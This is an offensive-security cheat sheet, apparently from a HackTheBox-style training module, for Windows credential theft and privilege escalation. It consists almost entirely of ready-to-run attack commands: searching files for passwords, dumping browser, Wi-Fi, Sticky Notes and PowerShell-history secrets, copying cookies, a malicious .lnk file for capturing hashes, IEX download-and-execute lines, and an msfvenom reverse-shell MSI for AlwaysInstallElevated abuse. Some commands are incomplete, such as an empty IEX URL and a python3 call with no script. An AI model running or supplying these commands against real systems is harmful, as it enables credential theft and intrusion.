Credential Theft

Application Configuration Files

# Clear Text Passwords
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

# Chrome Files
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

# Unattend.xml

# PS History
gc (Get-PSReadLineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Search File Contents for String

# Example 1
findstr /SI /M "password" *.xml *.ini *.txt

# Example 2
findstr /si password *.xml *.ini *.txt *.config

# Example 3
findstr /spin "password" *.*

Search File Content (PowerShell)

select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password

Search For File Extension

# Example 1
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

# Example 2
where /R C:\ *.config

Search For File Extension (PowerShell)

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

StickyNotes (PowerShell)

# Import Module
Import-Module .\PSSQLite.psd1

# Find DB
ls C:\Users\<user>\AppData\Local\Packages

# Set Veriable
$db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'

Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Cmdkey Saved Credentials

cmdkey /list

Browser Credentials

.\SharpChrome.exe logins /unprotect

Mail Credentials

Lazagne Tool

.\lazagne.exe all


# Import Module
Import-Module .\SessionGopher.ps1

# Run Tool
Invoke-SessionGopher -Target WINLPE-SRV01

WIFI Passwords

# View Saved Credentials
netsh wlan show profile

# Retrieve Saved Wireless Password
netsh wlan show profile ilfreight_corp key=clear

Network Capture

# Host this ps1 Script

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2


# Run in Memory on the target
IEX (iwr '') 

SCF on a File Share

# Save as @file.scf

# Start Responder
sudo responder -wrf -v -I tun0

Malicious Ink File

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"


Installed Applications

Get Installed Programs

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation

$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation

$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Discover Configuration Files

ls C:\Users\julio\AppData\Roaming\mRemoteNG

Abusing Cookies

Copy Cookies From FireFox

copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

Extract Cookies

python3 --dbpath "cookies.sqlite" --host slack --cookie d

Copy Cookies from Chromium Based

# Download & Run Script
IEX(New-Object Net.WebClient).DownloadString('tun0/Invoke-SharpChromium.ps1')

# Update Location
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"

# Run Tool
Invoke-SharpChromium -Command "cookies"


# Download
IEX(New-Object Net.WebClient).DownloadString('http://tun0/Invoke-Clipboard.ps1')

# Run 

Attacking Backup Servers

Check Backups

restic.exe -r E:\restic2\ snapshots

Restore Backup

# Restore Backup by ID
restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore

Other Techniques

Always Install Elevated

Verify Enabled

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate Malicious MSI

msfvenom -p windows/shell_reverse_tcp lhost= lport=4444 -f msi -o priv-esc.msi

Execute MSI

msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Scheduled Tasks

Enumerating Scheduled Tasks

Get-ScheduledTask | select TaskName,State


Mount VMDK (Linux)

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk

Mount VHD/VHDX (Linux)

guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

Last updated